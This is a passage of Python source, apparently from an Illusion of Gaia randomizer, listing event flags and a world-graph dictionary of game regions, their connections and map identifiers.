148: [101, 3, False, 0, [101, 102, 103, 104, 105], "", "", "", "", "Castoth Prize "],
149: [198, 3, False, 0, [100, 102, 103, 104, 105], "", "", "", "", "Viper Prize "],
150: [244, 3, False, 0, [100, 101, 103, 104, 105], "", "", "", "", "Vampires Prize "],
151: [302, 3, False, 0, [100, 101, 102, 104, 105], "", "", "", "", "Sand Fanger Prize "],
152: [448, 3, False, 0, [100, 101, 102, 103, 105], "", "", "", "", "Mummy Queen Prize "],
153: [479, 3, False, 0, [100, 101, 102, 103, 104], "", "", "", "", "Babel Prize "],
# Event Switches
500: [500, 4, True, 500, [], "", "", "", "", "Kara "],
501: [501, 4, True, 501, [], "", "", "", "", "Lilly "],
502: [502, 4, True, 502, [], "", "", "", "", "Moon Tribe: Spirits Healed "],
503: [503, 4, True, 503, [], "", "", "", "", "Inca: Castoth defeated "],
504: [504, 4, True, 504, [], "", "", "", "", "Freejia: Found Laborer "],
505: [505, 4, True, 505, [], "", "", "", "", "Neil's Memory Restored "],
506: [506, 4, True, 506, [], "", "", "", "", "Sky Garden: Map 82 NW Switch "],
507: [507, 4, True, 507, [], "", "", "", "", "Sky Garden: Map 82 NE Switch "],
508: [508, 4, True, 508, [], "", "", "", "", "Sky Garden: Map 82 SE Switch "],
509: [509, 4, True, 509, [], "", "", "", "", "Sky Garden: Map 84 Switch "],
510: [510, 4, True, 510, [], "", "", "", "", "Seaside: Fountain Purified "],
511: [511, 4, True, 511, [], "", "", "", "", "Mu: Water Lowered 1 "],
512: [512, 4, True, 512, [], "", "", "", "", "Mu: Water Lowered 2 "],
513: [513, 4, True, 513, [], "", "", "", "", "Angel: Puzzle Complete "],
514: [514, 4, True, 514, [], "", "", "", "", "Mt Kress: Drops used 1 "],
515: [515, 4, True, 515, [], "", "", "", "", "Mt Kress: Drops used 2 "],
516: [516, 4, True, 516, [], "", "", "", "", "Mt Kress: Drops used 3 "],
517: [517, 4, True, 517, [], "", "", "", "", "Pyramid: Hieroglyphs placed "],
518: [518, 4, True, 518, [], "", "", "", "", "Babel: Castoth defeated "],
519: [519, 4, True, 519, [], "", "", "", "", "Babel: Viper defeated "],
520: [520, 4, True, 520, [], "", "", "", "", "Babel: Vampires defeated "],
521: [521, 4, True, 521, [], "", "", "", "", "Babel: Sand Fanger defeated "],
522: [522, 4, True, 522, [], "", "", "", "", "Babel: Mummy Queen defeated "],
523: [523, 4, True, 523, [], "", "", "", "", "Mansion: Solid Arm defeated "],
# Misc
600: [600, 4, True, 600, [], "", "", "", "", "Freedan Access "],
601: [601, 4, True, 601, [], "", "", "", "", "Glitches "],
602: [602, 4, True, 602, [], "", "", "", "", "Early Firebird "],
603: [491, 4, True, 67, [], "", "", "", "", "Firebird "]
}
# World graph
# Format: { Region ID:
        #            0: Traversed_flag, 1: [AccessibleRegions], 2: type (0=other/misc, 1=exterior, 2=interior), 3: [continentID,areaID,layer,MapID],
# 4: DS_access (0=no_access,1=any_DS,2=form_change_DS),
# 5: RegionName,
# 6: [ItemsToRemove],
# 7: ForceFormChange,
# 8: [AccessibleFromNodes],
# 9: [Accessible_DS_nodes],
# 10: [Accessible_Nodes_w_Logic],
# 11: [item_locations],
# 12: [origin_logic],
# 13: [dest_logic],
# 14: [origin_exits],
# 15: [dest_exits] }
self.graph = {
# Game Start
0: [False, [22], 0, [0,0,0,b"\x00"], 0, "Game Start", [], True, [], [], [], [], [], [], [], []],
# Jeweler
1: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Access", [], False, [], [], [], [], [], [], [], []],
2: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 1", [], False, [], [], [], [], [], [], [], []],
3: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 2", [], False, [], [], [], [], [], [], [], []],
4: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 3", [], False, [], [], [], [], [], [], [], []],
5: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 4", [], False, [], [], [], [], [], [], [], []],
6: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 5", [], False, [], [], [], [], [], [], [], []],
7: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 6", [], False, [], [], [], [], [], [], [], []],
8: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 7", [], False, [], [], [], [], [], [], [], []],
# Overworld Menus
10: [False, [20,30,50,60,63], 0, [1,0,0,b"\x00"], 0, "Overworld: SW Continent", [], True, [], [], [], [], [], [], [], []],
11: [False, [102,110,133,160,162], 0, [2,0,0,b"\x00"], 0, "Overworld: SE Continent", [], True, [], [], [], [], [], [], [], []],
12: [False, [250,280,290], 0, [3,0,0,b"\x00"], 0, "Overworld: NE Continent", [], True, [], [], [], [], [], [], [], []],
13: [False, [310,330,350,360], 0, [4,0,0,b"\x00"], 0, "Overworld: N Continent", [], True, [], [], [], [], [], [], [], []],
14: [False, [400,410], 0, [5,0,0,b"\x00"], 0, "Overworld: NW Continent", [], True, [], [], [], [], [], [], [], []],
# Passage Menus
15: [False, [], 0, [0,0,0,b"\x00"], 0, "Passage: Seth", [], True, [], [], [], [], [], [], [], []],
16: [False, [], 0, [0,0,0,b"\x00"], 0, "Passage: Moon Tribe", [], True, [], [], [], [], [], [], [], []],
17: [False, [], 0, [0,0,0,b"\x00"], 0, "Passage: Neil", [], True, [], [], [], [], [], [], [], []],
# South Cape
20: [False, [1,10], 1, [1,1,0,b"\x00"], 0, "South Cape: Main Area", [], False, [], [], [], [], [], [], [], []],
21: [False, [20], 1, [1,1,0,b"\x00"], 0, "South Cape: School Roof", [], False, [], [], [], [], [], [], [], []],
22: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: School", [], False, [], [], [], [], [], [], [], []],
23: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: Will's House", [], False, [], [], [], [], [], [], [], []],
24: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: East House", [], False, [], [], [], [], [], [], [], []],
25: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: Seth's House", [], False, [], [], [], [], [], [], [], []],
26: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: Lance's House", [], False, [], [], [], [], [], [], [], []],
27: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: Erik's House", [], False, [], [], [], [], [], [], [], []],
28: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: Seaside Cave", [], False, [], [], [], [], [], [], [], []],
# Edward's / Prison
30: [False, [10], 1, [1,2,0,b"\x00"], 0, "Edward's Castle: Main Area", [], False, [], [], [], [], [], [], [], []],
31: [False, [30], 1, [1,2,0,b"\x00"], 0, "Edward's Castle: Behind Guard", [], False, [], [], [], [], [], [], [], []],
32: [False, [], 2, [1,2,0,b"\x00"], 0, "Edward's Prison: Will's Cell", [2], False, [], [], [], [], [], [], [], []],
33: [False, [], 2, [1,2,0,b"\x00"], 0, "Edward's Prison: Prison Main", [2], False, [], [], [], [], [], [], [], []],
# Underground Tunnel
40: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 12", [], False, [], [], [], [], [], [], [], []],
41: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 13", [], False, [], [], [], [], [], [], [], []],
42: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 14", [], False, [], [], [], [], [], [], [], []],
43: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 15", [], False, [], [], [], [], [], [], [], []],
44: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 16", [], False, [], [], [], [], [], [], [], []],
45: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 17 (entrance)", [], False, [], [], [], [], [], [], [], []],
46: [False, [45], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 17 (exit open)", [], False, [], [], [], [], [], [], [], []],
47: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 18 (before bridge)", [], False, [], [], [], [], [], [], [], []],
48: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 18 (after bridge)", [], False, [], [], [], [], [], [], [], []],
49: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Exit", [], True, [], [], [], [], [], [], [], []],
# Itory
50: [False, [10], 1, [1,3,0,b"\x00"], 0, "Itory: Entrance", [9], False, [], [], [], [], [], [], [], []],
51: [False, [50], 1, [1,3,0,b"\x00"], 0, "Itory: Main Area", [], False, [], [], [], [], [], [], [], []],
52: [False, [], 1, [1,3,0,b"\x00"], 0, "Itory: Lilly's Back Porch", [], False, [], [], [], [], [], [], [], []],
53: [False, [], 2, [1,3,0,b"\x00"], 0, "Itory: West House", [], False, [], [], [], [], [], [], [], []],
54: [False, [], 2, [1,3,0,b"\x00"], 0, "Itory: North House", [], False, [], [], [], [], [], [], [], []],
55: [False, [], 2, [1,3,0,b"\x00"], 0, "Itory: Lilly's House", [23], False, [], [], [], [], [], [], [], []],
56: [False, [], 2, [1,3,0,b"\x00"], 0, "Itory: Cave", [], False, [], [], [], [], [], [], [], []],
57: [False, [56], 2, [1,3,0,b"\x00"], 0, "Itory: Cave (behind false wall)", [], False, [], [], [], [], [], [], [], []],
58: [False, [], 2, [1,3,0,b"\x00"], 0, "Itory: Cave (secret room)", [], False, [], [], [], [], [], [], [], []],
59: [False, [55,501], 0, [1,3,0,b"\x00"], 0, "Itory: Got Lilly", [], False, [], [], [], [], [], [], [], []],
# Moon Tribe / Inca Entrance
60: [False, [10], 1, [1,4,0,b"\x00"], 0, "Moon Tribe: Main Area", [25], False, [], [], [], [], [], [], [], []],
61: [False, [], 2, [1,4,0,b"\x00"], 0, "Moon Tribe: Cave", [], False, [], [], [], [], [], [], [], []],
62: [False, [61], 2, [1,4,0,b"\x00"], 0, "Moon Tribe: Cave (Pedestal)", [], False, [], [], [], [], [], [], [], []],
63: [False, [10], 1, [1,5,0,b"\x00"], 0, "Inca: Entrance", [], False, [], [], [], [], [], [], [], []],
64: [False, [60,502], 0, [1,4,0,b"\x00"], 0, "Moon Tribe: Spirits Awake", [], False, [], [], [], [], [], [], [], []],
# Inca Ruins
70: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (NE)", [], False, [], [], [], [], [], [], [], []],
71: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (NW)", [], False, [], [], [], [], [], [], [], []],
72: [False, [70,73], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (N)", [], False, [], [], [], [], [], [], [], []],
73: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (center)", [], False, [], [], [], [], [], [], [], []],
74: [False, [72], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (SW)", [], False, [], [], [], [], [], [], [], []],
75: [False, [72,99], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (SE)", [], False, [], [], [], [], [], [], [], []],
76: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (statue head)", [], False, [], [], [], [], [], [], [], []],
77: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 30 (first area)", [3, 4], False, [], [], [], [], [], [], [], []],
78: [False, [77], 2, [1,5,0,b"\x00"], 0, "Inca: Map 30 (second area)", [], False, [], [], [], [], [], [], [], []],
79: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 31", [], False, [], [], [], [], [], [], [], []],
80: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 32 (entrance)", [], False, [], [], [], [], [], [], [], []],
81: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 32 (behind statue)", [], False, [], [], [], [], [], [], [], []],
82: [False, [83], 2, [1,5,0,b"\x00"], 0, "Inca: Map 33 (entrance)", [], False, [], [], [], [], [], [], [], []],
83: [False, [82], 2, [1,5,0,b"\x00"], 0, "Inca: Map 33 (over ramp)", [], False, [], [], [], [], [], [], [], []], # Need to prevent softlocks here
84: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 34", [], False, [], [], [], [], [], [], [], []],
85: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 35 (entrance)", [], False, [], [], [], [], [], [], [], []],
86: [False, [85], 2, [1,5,0,b"\x00"], 0, "Inca: Map 35 (over ramp)", [], False, [], [], [], [], [], [], [], []],
87: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 36 (main)", [8], False, [], [], [], [], [], [], [], []],
88: [False, [87], 2, [1,5,0,b"\x00"], 0, "Inca: Map 36 (exit opened)", [], False, [], [], [], [], [], [], [], []],
89: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 37 (main area)", [7], False, [], [], [], [], [], [], [], []],
90: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 37 (tile bridge)", [], False, [], [], [], [], [], [], [], []], # Check for potential softlock?
91: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 38 (south section)", [], False, [], [], [], [], [], [], [], []],
92: [False, [91], 2, [1,5,0,b"\x00"], 0, "Inca: Map 38 (behind statues)", [], False, [], [], [], [], [], [], [], []],
93: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 38 (north section)", [], False, [], [], [], [], [], [], [], []],
94: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 39", [], False, [], [], [], [], [], [], [], []],
95: [False, [96], 2, [1,5,0,b"\x00"], 0, "Inca: Map 40 (entrance)", [], False, [], [], [], [], [], [], [], []],
96: [False, [95], 2, [1,5,0,b"\x00"], 0, "Inca: Map 40 (past tiles)", [], False, [], [], [], [], [], [], [], []],
97: [False, [98,503], 2, [1,5,0,b"\x00"], 0, "Inca: Boss Room", [], True, [], [], [], [], [], [], [], []], # might need to add an exit for this
98: [False, [97], 2, [1,5,0,b"\x00"], 0, "Inca: Behind Boss Room", [], False, [], [], [], [], [], [], [], []],
99: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (SE door)", [], False, [], [], [], [], [], [], [], []],
# Gold Ship / Diamond Coast
100: [False, [104], 1, [1,5,0,b"\x00"], 0, "Gold Ship: Deck", [], False, [], [], [], [], [], [], [], []],
101: [False, [], 2, [1,5,0,b"\x00"], 0, "Gold Ship: Interior", [], False, [], [], [], [], [], [], [], []],
102: [False, [11], 1, [2,6,0,b"\x00"], 0, "Diamond Coast: Main Area", [], False, [], [], [], [], [], [], [], []],
103: [False, [], 2, [2,6,0,b"\x00"], 0, "Diamond Coast: House", [], False, [], [], [], [], [], [], [], []],
104: [False, [], 0, [1,5,0,b"\x00"], 0, "Gold Ship: Crow's Nest Passage", [], False, [], [], [], [], [], [], [], []],
# Freejia
110: [False, [11], 1, [2,7,0,b"\x00"], 0, "Freejia: Main Area", [], False, [], [], [], [], [], [], [], []],
111: [False, [1, 110], 1, [2,7,0,b"\x00"], 0, "Freejia: 2-story House Roof", [], False, [], [], [], [], [], [], [], []],
112: [False, [], 1, [2,7,0,b"\x00"], 0, "Freejia: Laborer House Roof", [], False, [], [], [], [], [], [], [], []],
113: [False, [110, 114], 1, [2,7,0,b"\x00"], 0, "Freejia: Labor Trade Roof", [], False, [], [], [], [], [], [], [], []],
114: [False, [110, 112], 1, [2,7,0,b"\x00"], 0, "Freejia: Back Alley", [], False, [], [], [], [], [], [], [], []],
115: [False, [110], 0, [2,7,0,b"\x00"], 0, "Freejia: Slaver", [], False, [], [], [], [], [], [], [], []],
116: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: West House", [], False, [], [], [], [], [], [], [], []],
117: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: 2-story House", [], False, [], [], [], [], [], [], [], []],
118: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Lovers' House", [], False, [], [], [], [], [], [], [], []],
119: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Hotel (common area)", [], False, [], [], [], [], [], [], [], []],
120: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Hotel (west room)", [], False, [], [], [], [], [], [], [], []],
121: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Hotel (east room)", [], False, [], [], [], [], [], [], [], []],
122: [False, [504], 2, [2,7,0,b"\x00"], 0, "Freejia: Laborer House", [], False, [], [], [], [], [], [], [], []],
123: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Messy House", [], False, [], [], [], [], [], [], [], []],
124: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Erik House", [], False, [], [], [], [], [], [], [], []],
125: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Dark Space House", [], False, [], [], [], [], [], [], [], []],
126: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Labor Trade House", [], False, [], [], [], [], [], [], [], []],
127: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Labor Market", [], False, [], [], [], [], [], [], [], []],
# Diamond Mine
130: [False, [131], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 61 (entrance)", [], False, [], [], [], [], [], [], [], []],
131: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 61 (behind barriers)", [], False, [], [], [], [], [], [], [], []],
132: [False, [131], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 61 (false wall)", [], False, [], [], [], [], [], [], [], []],
133: [False, [11], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 62", [], False, [], [], [], [], [], [], [], []],
134: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 63 (main)", [], False, [], [], [], [], [], [], [], []],
135: [False, [134], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 63 (elevator)", [], False, [], [], [], [], [], [], [], []],
136: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 64 (main)", [], False, [], [], [], [], [], [], [], []],
137: [False, [136], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 64 (trapped laborer)", [], False, [], [], [], [], [], [], [], []],
138: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 65 (main)", [], False, [], [], [], [], [], [], [], []],
139: [False, [138], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 65 (behind ramp)", [], False, [], [], [], [], [], [], [], []],
140: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 66 (elevator 1)", [], False, [], [], [], [], [], [], [], []],
141: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 66 (elevator 2)", [], False, [], [], [], [], [], [], [], []],
142: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 66 (Dark Space)", [], False, [], [], [], [], [], [], [], []],
143: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 66 (laborer)", [], False, [], [], [], [], [], [], [], []],
144: [False, [145], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 67 (entrance)", [], False, [], [], [], [], [], [], [], []],
145: [False, [144], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 67 (exit)", [], False, [], [], [], [], [], [], [], []], # potential softlock?
146: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 68 (main)", [], False, [], [], [], [], [], [], [], []],
147: [False, [146], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 68 (door open)", [], False, [], [], [], [], [], [], [], []],
148: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 69", [], False, [], [], [], [], [], [], [], []],
149: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 70", [], False, [], [], [], [], [], [], [], []],
150: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 71", [], False, [], [], [], [], [], [], [], []],
# Neil's Cottage / Nazca
160: [False, [11], 2, [2,9,0,b"\x00"], 0, "Neil's Cottage", [13], False, [], [], [], [], [], [], [], []],
161: [False, [17,160,505], 2, [2,9,0,b"\x00"], 0, "Neil's Cottage: Neil", [], False, [], [], [], [], [], [], [], []],
162: [False, [11], 1, [2,10,0,b"\x00"], 0, "Nazca Plain", [], False, [], [], [], [], [], [], [], []],
# Sky Garden
167: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 83 (SE)", [], False, [], [], [], [], [], [], [], []],
168: [False, [181], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 81 (north)", [], False, [], [], [], [], [], [], [], []],
169: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 86 (DS Room)", [], False, [], [], [], [], [], [], [], []],
170: [False, [], 1, [2,10,0,b"\x00"], 0, "Sky Garden: Foyer", [14, 14, 14, 14], False, [], [], [], [], [], [], [], []],
171: [False, [], 1, [2,10,0,b"\x00"], 0, "Sky Garden: Boss Entrance", [], False, [], [], [], [], [], [], [], []],
172: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 77 (main)", [], False, [], [], [], [], [], [], [], []],
173: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 77 (SW)", [], False, [], [], [], [], [], [], [], []],
174: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 77 (SE)", [], False, [], [], [], [], [], [], [], []],
175: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 78", [], False, [], [], [], [], [], [], [], []],
176: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 79 (main)", [], False, [], [], [], [], [], [], [], []],
177: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 79 (center)", [], False, [], [], [], [], [], [], [], []],
178: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 79 (behind barrier)", [], False, [], [], [], [], [], [], [], []],
179: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 80 (north)", [], False, [], [], [], [], [], [], [], []],
180: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 80 (south)", [], False, [], [], [], [], [], [], [], []],
181: [False, [168], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 81 (main)", [], False, [], [], [], [], [], [], [], []],
182: [False, [181], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 81 (west)", [], False, [], [], [], [], [], [], [], []],
183: [False, [182], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 81 (Dark Space cage)", [], False, [], [], [], [], [], [], [], []],
184: [False, [182], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 81 (SE platform)", [], False, [], [], [], [], [], [], [], []],
185: [False, [182], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 81 (SW platform)", [], False, [], [], [], [], [], [], [], []],
186: [False, [506], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 82 (north)", [], False, [], [], [], [], [], [], [], []], # deal with switches
187: [False, [508], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 82 (south)", [], False, [], [], [], [], [], [], [], []],
188: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 82 (NE)", [], False, [], [], [], [], [], [], [], []],
189: [False, [188,507], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 82 (switch cage)", [], False, [], [], [], [], [], [], [], []],
190: [False, [191], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 83 (NE)", [], False, [], [], [], [], [], [], [], []],
191: [False, [190, 192], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 83 (NW)", [], False, [], [], [], [], [], [], [], []],
192: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 83 (center)", [], False, [], [], [], [], [], [], [], []],
193: [False, [194], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 83 (SW)", [], False, [], [], [], [], [], [], [], []],
194: [False, [167], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 83 (chests)", [], False, [], [], [], [], [], [], [], []],
195: [False, [196], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 84 (main)", [], False, [], [], [], [], [], [], [], []],
196: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 84 (NE)", [], False, [], [], [], [], [], [], [], []],
197: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 84 (behind statue)", [], False, [], [], [], [], [], [], [], []],
198: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Boss Room", [], True, [], [], [], [], [], [], [], []],
199: [False, [197,509], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 84 (statue)", [], False, [], [], [], [], [], [], [], []],
# Seaside Palace
200: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 1", [16], False, [], [], [], [], [], [], [], []],
201: [False, [200], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 1 (door unlocked)", [], False, [], [], [], [], [], [], [], []],
202: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 1 NE Room", [], False, [], [], [], [], [], [], [], []],
203: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 1 NW Room", [], False, [], [], [], [], [], [], [], []],
204: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 1 SE Room", [], False, [], [], [], [], [], [], [], []],
205: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 2", [], False, [], [], [], [], [], [], [], []],
206: [False, [200], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Buffy", [], False, [], [], [], [], [], [], [], []],
207: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 2 SW Room", [], False, [], [], [], [], [], [], [], []],
208: [False, [205], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Coffin", [], False, [], [], [], [], [], [], [], []],
209: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Fountain", [17], False, [], [], [], [], [], [], [], []],
210: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Mu Passage", [16], False, [], [], [], [], [], [], [], []],
211: [False, [210], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Mu Passage (door unlocked)", [], False, [], [], [], [], [], [], [], []],
# Mu
212: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 95 (top)", [], False, [], [], [], [], [], [], [], []],
213: [False, [212], 2, [3,12,1,b"\x00"], 0, "Mu: Map 95 (middle E)", [], False, [], [], [], [], [], [], [], []],
214: [False, [], 2, [3,12,1,b"\x00"], 0, "Mu: Map 95 (middle W)", [], False, [], [], [], [], [], [], [], []],
215: [False, [213], 2, [3,12,2,b"\x00"], 0, "Mu: Map 95 (bottom E)", [], False, [], [], [], [], [], [], [], []],
216: [False, [214], 2, [3,12,2,b"\x00"], 0, "Mu: Map 95 (bottom W)", [], False, [], [], [], [], [], [], [], []],
217: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 96 (top)", [], False, [], [], [], [], [], [], [], []],
218: [False, [217], 2, [3,12,1,b"\x00"], 0, "Mu: Map 96 (middle)", [], False, [], [], [], [], [], [], [], []],
219: [False, [], 2, [3,12,2,b"\x00"], 0, "Mu: Map 96 (bottom)", [], False, [], [], [], [], [], [], [], []],
220: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 97 (top main)", [], False, [], [], [], [], [], [], [], []],
221: [False, [222, 223], 2, [3,12,0,b"\x00"], 0, "Mu: Map 97 (top island)", [], False, [], [], [], [], [], [], [], []],
222: [False, [], 2, [3,12,1,b"\x00"], 0, "Mu: Map 97 (middle NE)", [], False, [], [], [], [], [], [], [], []],
223: [False, [221], 2, [3,12,1,b"\x00"], 0, "Mu: Map 97 (middle SW)", [], False, [], [], [], [], [], [], [], []],
224: [False, [], 2, [3,12,2,b"\x00"], 0, "Mu: Map 97 (bottom)", [], False, [], [], [], [], [], [], [], []],
225: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 98 (top S)", [], False, [], [], [], [], [], [], [], []],
226: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 98 (top N)", [], False, [], [], [], [], [], [], [], []],
227: [False, [226], 2, [3,12,1,b"\x00"], 0, "Mu: Map 98 (middle E)", [], False, [], [], [], [], [], [], [], []],
228: [False, [], 2, [3,12,1,b"\x00"], 0, "Mu: Map 98 (middle W)", [], False, [], [], [], [], [], [], [], []],
229: [False, [227], 2, [3,12,2,b"\x00"], 0, "Mu: Map 98 (bottom E)", [], False, [], [], [], [], [], [], [], []],
230: [False, [228], 2, [3,12,2,b"\x00"], 0, "Mu: Map 98 (bottom W)", [], False, [], [], [], [], [], [], [], []],
231: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 99 (Room of Hope 1)", [18], False, [], [], [], [], [], [], [], []],
232: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 99 (Room of Hope 2)", [18], False, [], [], [], [], [], [], [], []],
233: [False, [], 2, [3,12,1,b"\x00"], 0, "Mu: Map 100 (middle E)", [], False, [], [], [], [], [], [], [], []],
234: [False, [], 2, [3,12,1,b"\x00"], 0, "Mu: Map 100 (middle W)", [], False, [], [], [], [], [], [], [], []],
235: [False, [], 2, [3,12,2,b"\x00"], 0, "Mu: Map 100 (bottom)", [], False, [], [], [], [], [], [], [], []],
236: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 101 (top)", [], False, [], [], [], [], [], [], [], []],
237: [False, [], 2, [3,12,1,b"\x00"], 0, "Mu: Map 101 (middle W)", [], False, [], [], [], [], [], [], [], []],
238: [False, [236], 2, [3,12,1,b"\x00"], 0, "Mu: Map 101 (middle E)", [], False, [], [], [], [], [], [], [], []],
